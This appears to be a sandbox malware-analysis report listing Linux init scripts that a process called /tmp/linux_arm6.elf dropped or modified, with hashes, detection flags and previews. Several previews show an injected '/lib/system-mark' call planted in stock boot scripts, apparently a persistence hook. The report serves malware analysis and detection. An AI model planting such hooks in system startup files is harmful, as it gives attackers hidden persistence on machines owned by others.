                                                                          Preview:#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] || exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

                                                                          /etc/init.d/anacron

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2124
                                                                          Entropy (8bit):4.760217966755678
                                                                          Encrypted:false
                                                                          SSDEEP:24:aiF8WzzU+LuN5K6YqfOv5i1CPeFecyZR11s+M8k93ILlfWW6910kF4T0Op:7RzgTNNOhi1eAryZR1vX5fTKX00+
                                                                          MD5:B8F9EF2F7B8875CFEE672094FF6B7829
                                                                          SHA1:901405E0A0F9AF0D39010FB609E06A34FA9918F5
                                                                          SHA-256:11696FDED80A45C7CD5351D01D0C4419E69A863C3774F7F37C3FD22F22F3EE16
                                                                          SHA-512:A90371D6664E9043A8FD43A8138B245C228AFF9E64AC6A41D73C849C0CF746ABFAEABB2C1D2BEEBBC05D7451A2B84DAE4E80A0BDF64864A390FE950437CB4745
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron || exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system-mark. exit 1. fi. log_daemon_msg "Starting

                                                                          /etc/init.d/apparmor

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3826
                                                                          Entropy (8bit):5.249219751257144
                                                                          Encrypted:false
                                                                          SSDEEP:96:RFCjnn83hjz3n1zJNSNuDNBqNPoNpMbANEF7gG9M3zRVhszRVhxRl:Wjn4hj779Gjl
                                                                          MD5:DE4607EB984BD8C2751A19FED2566718
                                                                          SHA1:B605ED61D40829230C99D2C54B401CD2E154DE20
                                                                          SHA-256:F6BC11FE360F4DB66CB6B1C7763DC087E5D8F76A7D8145F08F617FD10C4FBFFD
                                                                          SHA-512:D932550ED8287788D8E14165CB47EB3A649D40B8AE6E8EEEC6ADCCC3563D8B376BBDE5C804205BD9B174CC3786154292C2D352307F41D9649312D9BF615DFD0C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

                                                                          /etc/init.d/apport

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3050
                                                                          Entropy (8bit):5.216428196190724
                                                                          Encrypted:false
                                                                          SSDEEP:48:jV/OxxHuoBusZABLm/tiUmZmNndBuSZWg/e/fuppzDGdxboGxz5:jV/OxNDBusZABLm1BmOnbuSZWg2/anOT
                                                                          MD5:FB82D03D336FC2AC2901C9D28682B408
                                                                          SHA1:992649B4B941B5B5372A6215DA4A5231BFDCD0BF
                                                                          SHA-256:F9AFCA8A53AF95CC19F4D1D2495F80335924F5C65ABE9147C5D46AE29CBEC76C
                                                                          SHA-512:8EE7107F9FCB458989553B871B06823646B765980D7BBF84C7110C0FFEA116DE7D141D5FE21BA2CFDBCA9A423434AE276D3949AB6EF1EACED8DEF7DFE6D16C40
                                                                          Malicious:true
                                                                          Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] || exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME || true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] || mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] || [ -n "`ls /va

                                                                          /etc/init.d/avahi-daemon

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2453
                                                                          Entropy (8bit):4.851897064111941
                                                                          Encrypted:false
                                                                          SSDEEP:48:9s2V+ig+Ui83MZoJQukTS9VC2/ulMA0uv3uKv2ZsGyjyRft/zsDE7Ed:93oijU4ukTSZux0uv3uKvdJORlADHd
                                                                          MD5:84273238ABAA8A7DE2D516C95D92F171
                                                                          SHA1:875222E1EE9FE460931E5340C94F958D1DB14C9D
                                                                          SHA-256:2BDB658E48A470E440378BC4BC4CC48B9B228BC3DF759187787A7D9FD71EEC90
                                                                          SHA-512:C226B5813A17D0640FBC77D09889F19F638FF9701CCC2E933B3DC8749674BC1918FD22011096126FEBBBBF55F91BE1D78DF8CC176D4465BA4A2426414C2D1D88
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON || exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

                                                                          /etc/init.d/binfmt-support

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1193
                                                                          Entropy (8bit):5.0501124070839
                                                                          Encrypted:false
                                                                          SSDEEP:24:ai3V6yXngSBVSBNyj6edNHcBcN6ekvx2w5mw+76opC:73ZngWVWNMNH0Y6bJ2w4wrJ
                                                                          MD5:A79B82CEAEE457E62E6EA7BAF7D1CAE5
                                                                          SHA1:B1EEBF3A9994B719F88E63BAC51A40EF3E3A4082
                                                                          SHA-256:76950791A135F0DFCCBE3A246A8085304345B40AC3DFE30BF1CA53C6BF81FD95
                                                                          SHA-512:4B6A9CEAEAC8952255DA0EAED35DAB689D80D3BD2B7D69CF3BF36D36271CCA309114D3E32C6C6797143C991DF1EAEB6491A7A36DE6AF9633F71AECB4B3D40C4E
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system-mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 || exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable || CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable || CODE=$?. log_end_msg $CODE. exi

                                                                          /etc/init.d/bluetooth

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3071
                                                                          Entropy (8bit):5.403760092319036
                                                                          Encrypted:false
                                                                          SSDEEP:48:71OoPrcMbC/BUUzGrm92+kbM935LmiVQoOZoKkkFjM+Zh9YDFjMrfOte:79TcWC/BUeem92R4V5LROt5r9CE2A
                                                                          MD5:E001FF7DBF2452314EEC95D08540D7AF
                                                                          SHA1:B2B63E00B1685EAA0DACC4D5F2C07C15F0D6AE55
                                                                          SHA-256:D6AA950CFA0BA62353E3734AB3E43F1B402C1B7F95CAC3C5D99D8453D299BDF3
                                                                          SHA-512:A9EA2F92C5A94330041228C7AECEB44718EBA47017ED7A41DEC87D6EAD6D7B34F968A79CFCFDDCC38561D964D354BFB63F3F52C2EFEE76C38C80DECCEC2FA944
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

                                                                          /etc/init.d/console-setup.sh

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1301
                                                                          Entropy (8bit):4.3356283043101165
                                                                          Encrypted:false
                                                                          SSDEEP:24:9lBiePItKzeBcx2o8/z3ejhTJckS5gzjdJwZWkZg7zcOqb6:93PyKzYcg/LshTJckS5gJw8kG7A9b6
                                                                          MD5:FE88F57D8990408CAAF7688C8EB6D734
                                                                          SHA1:7160510037CCA5505F40EFBE4CE8CCC777EAECE3
                                                                          SHA-256:C01D230B67C35FB75446E7A4599A09751E8859A4462CD5EB34DF9F186B28049F
                                                                          SHA-512:3DDA7EAF95F80FD3E35D8FDBF9AB77126E2CBF39CAA5C7A1275227D5267683F43504B191F0E08E901F93667AAFEE1F21F79BA3C8A27D5622C990DAA3AE39583D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop|status). # console-setup isn't a daemon. ;;. start|force-reload|restart|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system-mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

                                                                          /etc/init.d/cron

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3111
                                                                          Entropy (8bit):4.911661386459712
                                                                          Encrypted:false
                                                                          SSDEEP:48:5PMic6MicW4dJIrcz8WD23fK2LAb38CE1ATGuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsZCTHMnidD/A3gU
                                                                          MD5:0E0A4A7372459B9C2D8F45BAA40A64B3
                                                                          SHA1:6DEAF952235F89CBDD83FBE48C89A4F048E52043
                                                                          SHA-256:2B88ED8EFDF3262040903719AA03156C8CD73B50CF2F2FCCACB33693FE4110D6
                                                                          SHA-512:4E11C50B5F5D95CAE5B374C4597DD83F79434876598BD9C5FC32D37B765885DC1FF920D96D6594E548F08DC9D367D8C74F704C9BA49056749E5A3B4CD6D13C50
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON || exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

                                                                          /etc/init.d/cryptdisks

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):955
                                                                          Entropy (8bit):5.160229628002615
                                                                          Encrypted:false
                                                                          SSDEEP:12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrPcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKZcr/ZkVyKDpjQ
                                                                          MD5:3B43339B088088E5B725575549A61F55
                                                                          SHA1:98AF37D27DC1A2EFE51AD74366137D375E631BB3
                                                                          SHA-256:BF85CED45A7B48892F49D608E189307CC08330A4F2834289B847B457DFD7D28A
                                                                          SHA-512:AF7347AEE4625DBD7C23A9A411362EC940B17DBBA794E9B89DC37D893EBCB445044BDB52D21197DBCEF73C75CF697E935D729110A2125D168E82D6B5E24938FC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn]*)..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart|reload|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.*)..echo "Usage: cryptdisks {start|stop|restart|reload|force-reload|force-start}"..exit 1..;;.esac..

                                                                          /etc/init.d/cryptdisks-early

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):914
                                                                          Entropy (8bit):5.158660421998386
                                                                          Encrypted:false
                                                                          SSDEEP:12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrPcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CeKYZkVyKDvjQ
                                                                          MD5:905C0E1E5CC6FFC62CA21752E3F1753E
                                                                          SHA1:8810356FC23199F23631A7656815A431E34C4C1A
                                                                          SHA-256:6418AB31DBC9A1222A89C3D896C534373D9CB2D8D5D42FC75699889979E0AC34
                                                                          SHA-512:C7735CFB23C6CC924E7B55D825F352EBFB86CAEA48DF358499EF294EBE82F49F325F3C1098AA717BA622A8545E9A116C2648B44E2066597C5D4A37E71E6F77F8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn]*)..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart|reload|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.*)..echo "Usage: cryptdisks-early {start|stop|restart|reload|force-reload|force-start}"..exit 1..;;.esac..

                                                                          /etc/init.d/cups

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2856
                                                                          Entropy (8bit):5.2245818519394565
                                                                          Encrypted:false
                                                                          SSDEEP:48:76MLNMwmbAzAZVCoLqLVO1Z6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/F1RetsJ:7BWwmEMZVChFB7UoAaZUoGDvuG/UoGr/
                                                                          MD5:A13A7862BD0038FC523BFDFD69743E21
                                                                          SHA1:02BDC079157F4E2DF13C4CD4EF92BF477512348E
                                                                          SHA-256:0B82721F8B1FA32F5D25FE373FCD6DC540296675AFAD5C04A0EA18C4855DF29D
                                                                          SHA-512:4856AEFE6C5516CD19438DAD4689B3D656BA0ACFD0E498ABDA54628E1287B2C9C340040799C5B8AE68DA67970E19B41264E0F7C0416108E53D6477F5F18C7AC9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON || exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

                                                                          /etc/init.d/cups-browsed

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):1979
                                                                          Entropy (8bit):5.144887658077899
                                                                          Encrypted:false
                                                                          SSDEEP:48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFS2b:7j3FpjhnV5upSYuv3ScJQ2b
                                                                          MD5:B6B52BC4EBC4D496D01B30E2CFCF2C62
                                                                          SHA1:0221F156258ED821216CBF81280EE6324BDD52E9
                                                                          SHA-256:62B6CC632C9AC071EF72CDEB7057A4B20B7AE17413A289AEC43A67162B20A989
                                                                          SHA-512:B6FD6007E039984D1E505A62C76BB3373F3AF4A4DCB7E1AB7E2DF5C66D9D2F87DEB3DE2DEE97DF8FC33E9F94975B64DF03049C4DF60A1F02FADF4D5A7F6D4ED8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

                                                                          /etc/init.d/dbus

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, Unicode text, UTF-8 text executable
                                                                          Category:dropped
                                                                          Size (bytes):3255
                                                                          Entropy (8bit):5.118926067111819
                                                                          Encrypted:false
                                                                          SSDEEP:96:9JOxbyAn/JNsQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jw2U1MSIr7nXmL
                                                                          MD5:B05B34CA2A32E2007677F6CD40C3AF66
                                                                          SHA1:48F6C6EC5AE325D1E72224E27E98DE1CF817C521
                                                                          SHA-256:6C0251B0D84D116413A6DEF3B4D1699017BE1114E025B5E7E4B546237209574E
                                                                          SHA-512:692CE95159E6677954A6E573ADCDC5BFF11301E37CF25501F7205164CC2F4D24B6758663BE5ABD680EEC2E22C08AA491CEC269DDB696AC2D4EF99798CBC30495
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -*- coding: utf-8 -*-.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON || exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system-mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

                                                                          /etc/init.d/gdm3

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3102
                                                                          Entropy (8bit):5.042976496573067
                                                                          Encrypted:false
                                                                          SSDEEP:48:78unF1gLpxNlduwTebFGBzB4ndfPaMa59zqKN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1XV3B2dUdaVAGvoe2Wtc
                                                                          MD5:34C249DFA3336DB31FBE66E1CD5758F6
                                                                          SHA1:4B86122506102F1A88F72FF6D83C8E32B88F9D1E
                                                                          SHA-256:EE131550054FD4C8053F1C139C7F96CDBA8FD3F7CCFA78C1ED87DDD4FFC10D47
                                                                          SHA-512:B88FE306642B0757B24110D43BFF4A286D24C1995C0E6C3E9429E85E51D9D9DD4150BB4F99F818EDBC3CF2AFB2F9CE30CB1E7928B15CF8D41ADC330D3F0C58F3
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON || exit 0..if [ -r /etc/default/locale ]; then./lib/system-mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

                                                                          /etc/init.d/hddtemp

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):3163
                                                                          Entropy (8bit):5.259424339682965
                                                                          Encrypted:false
                                                                          SSDEEP:48:ietQlU+vdYb5tM7yL7yi47yIrrF9o6YRK50JDRABzNJuhCv8Z//UZJ7iuh052m3s:FtQlTd65tp6iN0oLRsQaAsUkho2mc
                                                                          MD5:78C631FF42D0225229009886F9999B56
                                                                          SHA1:4FAEF5CD07FC43C3AE00A1D09116580664EB9158
                                                                          SHA-256:0EA1C7D35BA69FB47D9AF56AA7FEEA00CC2F0A0F1ACB5796C48D4BB95F980D9E
                                                                          SHA-512:DF5DE7A268F0FFB5C6E95A32128877AAB05EA46331471D95E97DD4A31B883D0B9DE9005EC995F37AA254BEFE27A252961FF37148BB3E7896E30373FC16F96D84
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
